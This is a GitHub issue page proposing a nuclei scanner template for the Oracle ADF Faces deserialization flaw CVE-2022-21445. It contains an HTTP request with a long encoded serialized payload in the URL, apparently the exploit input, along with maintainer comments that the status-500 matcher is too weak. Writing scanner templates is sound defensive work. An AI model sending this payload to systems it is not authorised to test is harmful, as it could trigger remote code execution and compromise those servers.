nuclei-templates icon indicating copy to clipboard operation
nuclei-templates copied to clipboard

Published 20 hours ago verified publisher icon projectdiscovery

oracle-adf-faces-miracle-rce PoC CVE-2022-21445

Open x4yah opened this issue 1 year ago • 2 comments

Template Information:

Vulnerability in the Oracle JDeveloper product of Oracle Fusion Middleware (component: ADF Faces). Supported versions that are affected are 12.2.1.3.0 and 12.2.1.4.0. Easily exploitable vulnerability allows unauthenticated attacker with network access via HTTP to compromise Oracle JDeveloper. Successful attacks of this vulnerability can result in takeover of Oracle JDeveloper. CVSS 3.1 Base Score 9.8 (Confidentiality, Integrity and Availability impacts). CVSS Vector: (CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H).

info:

Nuclei Template:

id: oracle-adf-faces-miracle-rce
info:
  name: Oracle ADF Faces 'Miracle' RCE (CVE-2022-21445)
  author: Diego Aristiguieta AKA X4yh
  severity: high
  tags: cve, cve2022, oracle
  reference: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-21445
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H
    cvss-score: 9.8
    cwe-id: CWE-502
 

http:
  - method: GET
    path:
      - "{{BaseURL}}/bicomposer/afr/khewz/remote/H4sIAAAAAAAACnWMsU7DMBCGr6RRU9QBGBg6IrHaLZRAYSgSUkWksIDYcRu3NjKxsa_FXXgMnoKXQDwBKzMrb4AETpWVX7rTd9L93%2Bs3xM7C9j1bMrJAqcglc%2BKKmbj1%2Bfa%2Be_cRwcYYNpVmxZhNUdsM2igsd0KrwpvROVTpPCVhb4VpBFlnLSs5ktvr_GX_OO3%2BfNkIWhkkIsgvdMEzaBptMYc2W6DQVuIKYSevilSxck5v0MpyfpZDcyYVf4RniAIL7bDmxFiNeqpVfUeWz9bozW8dhK6Q2Ds4TAe94SDtD4_6JxMy8c6RB47QoNV_jEGLaIxH2KvglNL_W9T_AbBHMtQxAQAA/"
    headers:
      Cookie: ORA_BIPS_LBINFO=18c5565cd8a
      Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
      Accept-Encoding: gzip,deflate,br
      User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/108.0.0.0 Safari/537.36
      Connection: Keep-alive
    matchers:
      - type: status
        status:
          - 500

x4yah avatar Dec 10 '23 21:12 x4yah

When do you Update it in Nuclei template.

ghost avatar Jan 24 '24 11:01 ghost

Hi @x4yah, We appreciate you sharing this template with us, but the matcher is quite weak and will lead to a lot of false positives. Could you please update the template with the POC reference and the additional unique matcher?

ritikchaddha avatar Jan 25 '24 07:01 ritikchaddha

Closing this issue due to inactivity. Feel free to reopen it if you have more information

ritikchaddha avatar May 14 '24 04:05 ritikchaddha